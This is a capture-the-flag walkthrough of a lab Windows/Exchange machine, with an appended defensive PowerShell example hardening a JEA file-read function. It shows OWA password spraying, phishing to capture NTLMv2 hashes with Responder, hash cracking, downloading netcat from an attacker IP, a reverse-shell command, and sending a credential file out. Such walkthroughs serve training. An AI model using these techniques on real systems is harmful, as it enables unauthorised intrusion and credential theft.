Basic information

Port scan

$ nmap -sC -sV 10.10.10.210
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-02 13:18 CST
Nmap scan report for 10.10.10.210
Host is up (0.069s latency).
Not shown: 991 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp open ssl/http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=Reel2
| Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
| Not valid before: 2020-07-30T10:12:46
|_Not valid after: 2025-07-30T10:12:46
|_ssl-date: 2020-11-02T05:20:05+00:00; 0s from scanner time.
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.46 seconds

80

Port 80 answers with a 403:

443

Port 443 serves only the IIS default page:

8080

On 8080 anyone can register and log in. Inside there are a number of user names that can be harvested into a username list and then expanded into the usual account-name formats:

usernames

names.txt

cube cube
cube0x0 cube0x0
sven svensson
lars larsson
jenny adams
teresa trump

UserName.py

#!/usr/bin/env python
# Expand "first last" name pairs (one per line) into common username formats.
import sys
import os.path

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: {} names.txt".format(sys.argv[0]))
        sys.exit(1)

    if not os.path.exists(sys.argv[1]):
        print("{} not found".format(sys.argv[1]))
        sys.exit(1)

    for line in open(sys.argv[1]):
        # keep letters and spaces only; note this also drops digits,
        # which is why "cube0x0" turns into "cubex" in the output below
        name = ''.join([c for c in line if c == " " or c.isalpha()])

        tokens = name.lower().split()

        # skip empty lines
        if len(tokens) < 1:
            continue

        fname = tokens[0]
        lname = tokens[-1]

        print(fname + lname)            # johndoe
        print(lname + fname)            # doejohn
        print(fname + "." + lname)      # john.doe
        print(lname + "." + fname)      # doe.john
        print(lname + fname[0])         # doej
        print(fname[0] + lname)         # jdoe
        print(lname[0] + fname)         # djohn
        print(fname[0] + "." + lname)   # j.doe
        print(lname[0] + "." + fname)   # d.john
        print(fname)                    # john
        print(lname)                    # doe

usernames

cubecube
cubecube
cube.cube
cube.cube
cubec
ccube
ccube
c.cube
c.cube
cube
cube
cubexcubex
cubexcubex
cubex.cubex
cubex.cubex
cubexc
ccubex
ccubex
c.cubex
c.cubex
cubex
cubex
svensvensson
svenssonsven
sven.svensson
svensson.sven
svenssons
ssvensson
ssven
s.svensson
s.sven
sven
svensson
larslarsson
larssonlars
lars.larsson
larsson.lars
larssonl
llarsson
llars
l.larsson
l.lars
lars
larsson
jennyadams
adamsjenny
jenny.adams
adams.jenny
adamsj
jadams
ajenny
j.adams
a.jenny
jenny
adams
teresatrump
trumpteresa
teresa.trump
trump.teresa
trumpt
ttrump
tteresa
t.trump
t.teresa
teresa
trump

Directory scan

Because 443 only served the default page, brute-force directories right away. This turns up /owa, i.e. Exchange (the /exchange, /rpc and /public paths belong to the same install):

gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50

/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)

passwords

The 8080 site shows the line 'This summer is so hot!'. That is a password hint, so pull every Summer-based entry out of rockyou as the password list (grep is case-sensitive here, so only the capitalised form is kept):

➜  Reel2 cat /usr/share/wordlists/rockyou.txt | grep Summer > pass.txt
➜ Reel2 cat pass.txt
Summer
Summer1
Summer07
Summer08
Summer06
Summer05
Summer01
Summer99
Summer11
Summer2007
Summertime
Summer04
Summer03
Summer2
Summer12
Summer09
Summer!
Summer13
Summer123
Summerland
Summer7
Summer69
Summer5
Summer24
Summer22
Summer02
Summers
Summerof69
Summer9
Summer8
Summer4
Summer3
Summer2009
Summer2008
Summer2005
Summer18
Summer00
Summersalt
Summer_87
SummerSun
SummerOf69
Summer88
Summer87
Summer86
Summer83
Summer77
Summer73
Summer27
Summer26
Summer25
Summer23
Summer21
Summer2006
Summer1975
Summer2020
Summer16
Summer10
Summer07!
Summer0
Summer.
Summer#5
BuffySummers
2Summer
Summeryay
Summervirgo
Summertje26481
Summertime@6
Summertime321
Summertime2
Summertime1606
Summertime07
Summertime06
Summertime04
Summertime03
Summersunset1
Summerstar
Summersky
Summerside
Summers25!
Summers1
Summers08
Summers01
Summerrain1
SummerofLove
Summerof2007
Summerof2005
Summerocks21
Summernights
Summermist
Summerlynn24
Summerlyn6891
Summerlovin25
Summerlovin
Summerloven
Summerlove16
Summerlol
Summerlin22
Summerlee3
Summerland58
Summerisover1
Summerhill
Summerheat12
Summerhayes
Summergrl18
Summerglenn
Summergirl94
Summerg!rl!17
Summerfun99
Summerfun2006
Summerfun2
Summerfun
Summerfest
Summercem1905
Summerbjs1
Summeraye1
Summer_dog
SummerRiver
SummerOpen
SummerNats20
SummerNats
SummerMelody
SummerMay
SummerLuv1
SummerLove
SummerJubilee1
SummerHill
SummerHalliday92
SummerGirl
SummerG411
SummerG1
SummerDay18
SummerD15
SummerBreeze
SummerBay
SummerB21
SummerAngel0805
Summer@189
Summer@008
Summer><4691
Summer;
Summer98
Summer95
Summer93
Summer901
Summer90
Summer7k
Summer79
Summer78*
Summer78
Summer701
Summer68
Summer66
Summer64
Summer61
Summer58
Summer57
Summer566
Summer524
Summer5!
Summer4me
Summer4986
Summer4677
Summer456
Summer45
Summer44
Summer365
Summer34
Summer3232
Summer2k7
Summer2Winter
Summer284Time
Summer2425
Summer2311
Summer2310
Summer219
Summer2100
Summer21*
Summer2010
Summer2002
Summer17
Summer150207
Summer15
Summer14+
Summer14
Summer1313
Summer124#
Summer11Blueyes
Summer1029
Summer101
Summer098
Summer08,,x*
Summer078
Summer001!
Summer0!
Summer.07
Summer-leeAlbert
Summer-feild
Summer-Dayzes
Summer#69
Summer!9
Summer!!
Summer breaak
Spring2Summer
ShiatsuSummer2007
SSummer905
LongHotSummer
LisaSummers
JamienSummerRae
DonnaSummerHero
BabySummer
BSummers*
4Summer
2546Summer
21Summer
1Summer
19Summerlee
12Summer
0Summertime
000Summer
(Summertime)

Spraying OWA

We now have a username list, a password list and an OWA endpoint, so the next step is to spray OWA. There is a dedicated tool for this (SprayingToolkit's atomizer). Note that the list above was written to pass.txt while the command below reads passwords.txt; use one name. Spraying (one password across the whole user list per round) is what keeps this under the account lockout threshold, so check the domain lockout policy before shortening the interval:

(The password is Summer2020. It does appear in the grep output above; if your copy of rockyou lacks it, add current-year variants yourself.)

python3 ../tools/SprayingToolkit/atomizer.py  owa 10.10.10.210 passwords.txt names.txt -i 0:0:01
[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL: https://10.10.10.210/autodiscover/autodiscover.xml
[+] OWA domain appears to be hosted internally
[+] Got internal domain name using OWA: HTB
[*] Starting spray at 2020-11-02 05:52:52 UTC
...
[+] Found credentials: s.svensson:Summer2020
...

Logging in works. The interface language is awkward, so translate the page in the browser:

Hash theft

With what we have, a search turns up the exploitation route:

Send a phishing email to every user containing a link to our host while Responder listens. When a recipient opens the link, Responder's HTTP listener demands NTLM authentication and records the NTLMv2 response (the hash):

Also, Responder misbehaves on macOS, so I switched to a Kali VM to run it, and it takes a short wait before the hash arrives:

sudo responder -I tun0

Hash cracking

[HTTP] NTLMv2 Client   : 10.10.10.210
[HTTP] NTLMv2 Username : htb\k.svensson
[HTTP] NTLMv2 Hash : k.svensson::htb:ec98350342dd9944:EFF17420424C1C052103254AFCC5A8D9:0101000000000000C6282765E4B0D601100845EF44E2D90E000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000000000000040000090FD6E60D9736C5278A4A765E1E90D9A046F9ACEF2B49B66919ACBC3BA8E37310A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00310032000000000000000000

sudo hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force
...
K.SVENSSON::htb:ec98350342dd9944:eff17420424c1c052103254afcc5a8d9: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:kittycat1
...

The cracked password is kittycat1, for the user k.svensson.

user flag

Next: WinRM-based tools did not get a shell on this server, but PowerShell remoting does work, so log in from pwsh with New-PSSession (this itself speaks WinRM, so the service is reachable; it is the session that is restricted, as the next step shows):

apt install gss-ntlmssp # important: Kali has PowerShell, but without this package the NTLM (Negotiate) connection fails
apt install powershell

➜ ~ pwsh
...

PS /home/miao> $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson

PowerShell credential request
Enter your credentials.
Password for user k.svensson: *********

PS /home/miao> Enter-PSSession $offsec_session
[10.10.10.210]: PS>

Commands in this session cannot be run as-is (no bare ls, cd and so on); wrap each one in a script block with &{ ... }, as in the commands below:

Then read user.txt:

Reverse shell

Drop a reverse PowerShell shell to make the rest easier (spool\drivers\color is used because that directory is writable by standard users):

&{ iwr -uri http://10.10.14.12:9999/nc64.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
&{ cd 'C:\Windows\System32\spool\drivers\color\'}
&{ ./nc.exe 10.10.14.12 4445 -e powershell.exe}

Privilege escalation enumeration

Earlier we saw a Sticky Notes.lnk on the user's desktop. Following it, "C:\Users\k.svensson\AppData\Roaming\stickynotes\Local Storage\leveldb" contains a log file with a set of credentials:

nc.exe 10.10.14.12 4444 < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"

{"first":"<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>","back":"rgb(255, 242, 171)","title":"rgb(255, 235, 129)","wid":"350","hei":"375","deleted":"no","closed":"yes","locked":"no"}

jea_test_account:Ab!Q@vcg^%@#1

Then C:\Users\k.svensson\Documents holds two files, a JEA role capability (.psrc) and a session configuration (.pssc).

Reading them: jea_test_account gets a single function, Check-File, which returns the content of any path that merely starts with D:\ or C:\ProgramData\ (a string -like test), and the session runs as a virtual account (RunAsVirtualAccount = $true), i.e. as a local administrator. The check is on the path string, not on where it resolves, so we can create a junction under C:\ProgramData pointing at the Administrator profile and read through it.

jea_test_account.psrc

@{

# ID used to uniquely identify this document
GUID = '08c0fdac-36ef-43b5-931f-68171c4c8200'

# Author of this document
Author = 'cube0x0'

# Description of the functionality provided by these settings
# Description = ''

# Company associated with this document
CompanyName = 'Unknown'

# Copyright statement for this document
Copyright = '(c) 2020 cube0x0. All rights reserved.'

# Modules to import when applied to a session
# ModulesToImport = 'MyCustomModule', @{ ModuleName = 'MyCustomModule'; ModuleVersion = '1.0.0.0'; GUID = '4d30d5f0-cb16-4898-812d-f20a6c596bdf' }

# Aliases to make visible when applied to a session
# VisibleAliases = 'Item1', 'Item2'

# Cmdlets to make visible when applied to a session
# VisibleCmdlets = 'Invoke-Cmdlet1', @{ Name = 'Invoke-Cmdlet2'; Parameters = @{ Name = 'Parameter1'; ValidateSet = 'Item1', 'Item2' }, @{ Name = 'Parameter2'; ValidatePattern = 'L*' } }

# Functions to make visible when applied to a session
# VisibleFunctions = 'Invoke-Function1', @{ Name = 'Invoke-Function2'; Parameters = @{ Name = 'Parameter1'; ValidateSet = 'Item1', 'Item2' }, @{ Name = 'Parameter2'; ValidatePattern = 'L*' } }

# External commands (scripts and applications) to make visible when applied to a session
# VisibleExternalCommands = 'Item1', 'Item2'

# Providers to make visible when applied to a session
# VisibleProviders = 'Item1', 'Item2'

# Scripts to run when applied to a session
# ScriptsToProcess = 'C:\ConfigData\InitScript1.ps1', 'C:\ConfigData\InitScript2.ps1'

# Aliases to be defined when applied to a session
# AliasDefinitions = @{ Name = 'Alias1'; Value = 'Invoke-Alias1'}, @{ Name = 'Alias2'; Value = 'Invoke-Alias2'}

# Functions to define when applied to a session
FunctionDefinitions = @{
'Name' = 'Check-File'
'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME) [bool]$Check=$Path -like "D:\*" -or $Path -like "C:\ProgramData\*" ; if($check) {get-content $Path}} }

# Variables to define when applied to a session
# VariableDefinitions = @{ Name = 'Variable1'; Value = { 'Dynamic' + 'InitialValue' } }, @{ Name = 'Variable2'; Value = 'StaticInitialValue' }

# Environment variables to define when applied to a session
# EnvironmentVariables = @{ Variable1 = 'Value1'; Variable2 = 'Value2' }

# Type files (.ps1xml) to load when applied to a session
# TypesToProcess = 'C:\ConfigData\MyTypes.ps1xml', 'C:\ConfigData\OtherTypes.ps1xml'

# Format files (.ps1xml) to load when applied to a session
# FormatsToProcess = 'C:\ConfigData\MyFormats.ps1xml', 'C:\ConfigData\OtherFormats.ps1xml'

# Assemblies to load when applied to a session
# AssembliesToLoad = 'System.Web', 'System.OtherAssembly, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'

}

jea_test_account.pssc

@{

# Version number of the schema used for this document
SchemaVersion = '2.0.0.0'

# ID used to uniquely identify this document
GUID = 'd6a39756-aa53-4ef6-a74b-37c6a80fd796'

# Author of this document
Author = 'cube0x0'

# Description of the functionality provided by these settings
# Description = ''

# Session type defaults to apply for this session configuration. Can be 'RestrictedRemoteServer' (recommended), 'Empty', or 'Default'
SessionType = 'RestrictedRemoteServer'

# Directory to place session transcripts for this session configuration
# TranscriptDirectory = 'C:\Transcripts\'

# Whether to run this session configuration as the machine's (virtual) administrator account
RunAsVirtualAccount = $true

# Scripts to run when applied to a session
# ScriptsToProcess = 'C:\ConfigData\InitScript1.ps1', 'C:\ConfigData\InitScript2.ps1'

# User roles (security groups), and the role capabilities that should be applied to them when applied to a session
RoleDefinitions = @{
'htb\jea_test_account' = @{
'RoleCapabilities' = 'jea_test_account' } }

# Language mode to apply when applied to a session. Can be 'NoLanguage' (recommended), 'RestrictedLanguage', 'ConstrainedLanguage', or 'FullLanguage'
LanguageMode = 'NoLanguage'

}

Privilege escalation

Create the junction, then read root.txt as jea_test_account:

# target powershell
New-Item -ItemType Junction -Path 'C:\ProgramData\miao' -Target 'C:\Users\Administrator'

# local pwsh
PS /home/miao> $username = "jea_test_account"
PS /home/miao> $password = ConvertTo-SecureString "Ab!Q@vcg^%@#1" -AsPlainText -Force
PS /home/miao> $cred = New-Object System.Management.Automation.PSCredential -ArgumentList ($username, $password)
PS /home/miao> Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate
[10.10.10.210]: PS>Check-File C:\programdata\miao\Desktop\root.txt
5914fa1b443305f23ba79db43a27e5dd
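Why the junction works, and what a safe version of the role capability looks like, as an added example (written for this edit, not part of the original write-up or of the box's configuration). It puts the Check-File body from jea_test_account.psrc next to a hardened version that normalises the path, re-checks the prefix on the normalised form, and refuses any junction or symlink between the allowed root and the file, then reproduces the bypass on constructed directories under $env:TEMP so it needs no write access to C:\ProgramData. For that reason the allowed roots are a parameter; the defaults match the .psrc. Windows only, since junctions are an NTFS feature.

```powershell
# Added example, not from the original write-up. Constructed sample data throughout.

# As shipped on the box: a string-prefix check, then Get-Content on whatever the path resolves to.
# Get-Content follows junctions and symlinks, so any directory the caller can write to under an
# allowed root becomes a read primitive for the whole disk (the endpoint runs as a virtual admin).
function Check-File-Vulnerable {
    param($Path, [string[]]$AllowedRoots = @('D:\', 'C:\ProgramData\'))
    [bool]$check = @($AllowedRoots | Where-Object { $Path -like "$_*" }).Count -gt 0
    if ($check) { Get-Content $Path }
}

# Hardened: normalise first, check the prefix on the normalised form, then walk every component
# between the allowed root and the file and refuse any reparse point (junction or symlink).
function Check-File-Hardened {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$AllowedRoots = @('D:\', 'C:\ProgramData\')
    )
    if (-not [System.IO.Path]::IsPathRooted($Path)) { throw "Absolute path required: $Path" }
    # GetFullPath collapses '.' and '..' so the prefix test sees the real location
    $full  = [System.IO.Path]::GetFullPath($Path)
    $roots = $AllowedRoots | ForEach-Object { $_.TrimEnd('\') + '\' }
    $root  = $roots | Where-Object { $full.StartsWith($_, [System.StringComparison]::OrdinalIgnoreCase) } |
             Select-Object -First 1
    if (-not $root) { throw "Path outside allowed roots: $full" }

    # From the file up to (but not including) the trusted root: a reparse point anywhere on
    # this chain means the real target is not where the prefix says it is.
    $item = Get-Item -LiteralPath $full -Force -ErrorAction Stop
    while ($item.FullName.TrimEnd('\').Length -gt $root.TrimEnd('\').Length) {
        if ($item.Attributes.HasFlag([System.IO.FileAttributes]::ReparsePoint)) {
            throw "Reparse point on path, refusing: $($item.FullName)"
        }
        $item = Get-Item -LiteralPath (Split-Path -Parent $item.FullName) -Force
    }
    Get-Content -LiteralPath $full
}

# --- Reproduction on throw-away directories standing in for C:\ProgramData and C:\Users\Administrator ---
$base    = Join-Path $env:TEMP ("jea-demo-" + [guid]::NewGuid())
$allowed = Join-Path $base 'ProgramData'
$secret  = Join-Path $base 'Administrator'
New-Item -ItemType Directory -Path $allowed, $secret | Out-Null
Set-Content -Path (Join-Path $secret 'root.txt') -Value 'constructed-sample-flag'

# The step from the write-up: a junction inside the allowed tree that points outside it
New-Item -ItemType Junction -Path (Join-Path $allowed 'miao') -Target $secret | Out-Null
$probe = Join-Path $allowed 'miao\root.txt'

"Vulnerable : " + (Check-File-Vulnerable -Path $probe -AllowedRoots @($allowed))   # hands over the flag
try   { "Hardened   : " + (Check-File-Hardened -Path $probe -AllowedRoots @($allowed)) }
catch { "Hardened   : refused ($($_.Exception.Message))" }

# A genuine file under the root still reads fine with the hardened check
Set-Content -Path (Join-Path $allowed 'ok.txt') -Value 'allowed-content'
"Hardened OK: " + (Check-File-Hardened -Path (Join-Path $allowed 'ok.txt') -AllowedRoots @($allowed))

# Clean up: delete the junction itself (not its target), then the tree
[System.IO.Directory]::Delete((Join-Path $allowed 'miao'))
Remove-Item -LiteralPath $base -Recurse -Force
```

The second fix belongs in the .pssc rather than in the function: RunAsVirtualAccount = $true makes every allowed command execute as a local administrator, so a file-read helper becomes a read of the whole disk. Run the endpoint as a least-privileged identity instead (RunAsVirtualAccountGroups to keep the virtual account out of Administrators, or a GroupManagedServiceAccount) and set TranscriptDirectory so such reads are logged.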

References